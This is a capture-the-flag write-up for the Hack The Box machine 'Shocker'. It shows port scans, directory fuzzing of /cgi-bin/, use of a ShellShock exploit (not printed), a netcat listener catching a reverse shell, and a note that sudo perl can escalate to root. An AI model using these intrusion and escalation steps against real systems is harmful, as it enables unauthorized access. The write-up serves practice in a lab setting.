Vulnerability Explanation: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock."
Privilege Escalation Vulnerability: Insecure service configuration
Vulnerability Fix: You should always conform to the principle of least privilege and the concept of separation of privileges.
Severity:Critical
An initial nmap scan revealed the Apache version 2.4.18 running on port 8080.
# Nmap 7.91 scan initiated Tue Nov 16 19:03:32 2021 as: nmap -sC -sV -v -p- -oN nmap/full 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.34s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
3398/tcp filtered sapcomm
10044/tcp filtered unknown
15794/tcp filtered unknown
25723/tcp filtered unknown
29621/tcp filtered unknown
33041/tcp filtered unknown
36919/tcp filtered unknown
40374/tcp filtered unknown
40801/tcp filtered unknown
45501/tcp filtered unknown
48906/tcp filtered unknown
55879/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 16 19:37:19 2021 -- 1 IP address (1 host up) scanned in 2026.90 seconds
The shocker main page is shown below:
Fuzzing the website find any existing directories.
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/11/16 21:13:50 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
The /cgi-bin/ directory gives a 403 ( You don’t have permission to access /cgi-bi/ on this server)
Enumerating more on the /cgi-bin/ directory and looking for files with extensions “sh” and “cgi”.
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,cgi -f
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,cgi
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/11/16 21:19:12 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
Getting back a bash script (user.sh) that contain the content as follow:
Content-Type: text/plain
Just an uptime test script
19:20:42 up 4:24, 0 users, load average: 0.02, 0.02, 0.00
Identified an exploit for shellshock using searchsploit
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# nc -nlvp 9001 1 ⨯
listening on [any] 9001 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.56] 52132
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
user.txt
shelly@Shocker:/home/shelly$ cat user.txt && hostname && whoami && ip addr
cat user.txt && hostname && whoami && ip addr
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Shocker
shelly
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:6ef9/64 scope link
valid_lft forever preferred_lft forever
Run sudo -l command to determine what permissions the use shelly have.
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Run a perl code using sudo to escalate the access.
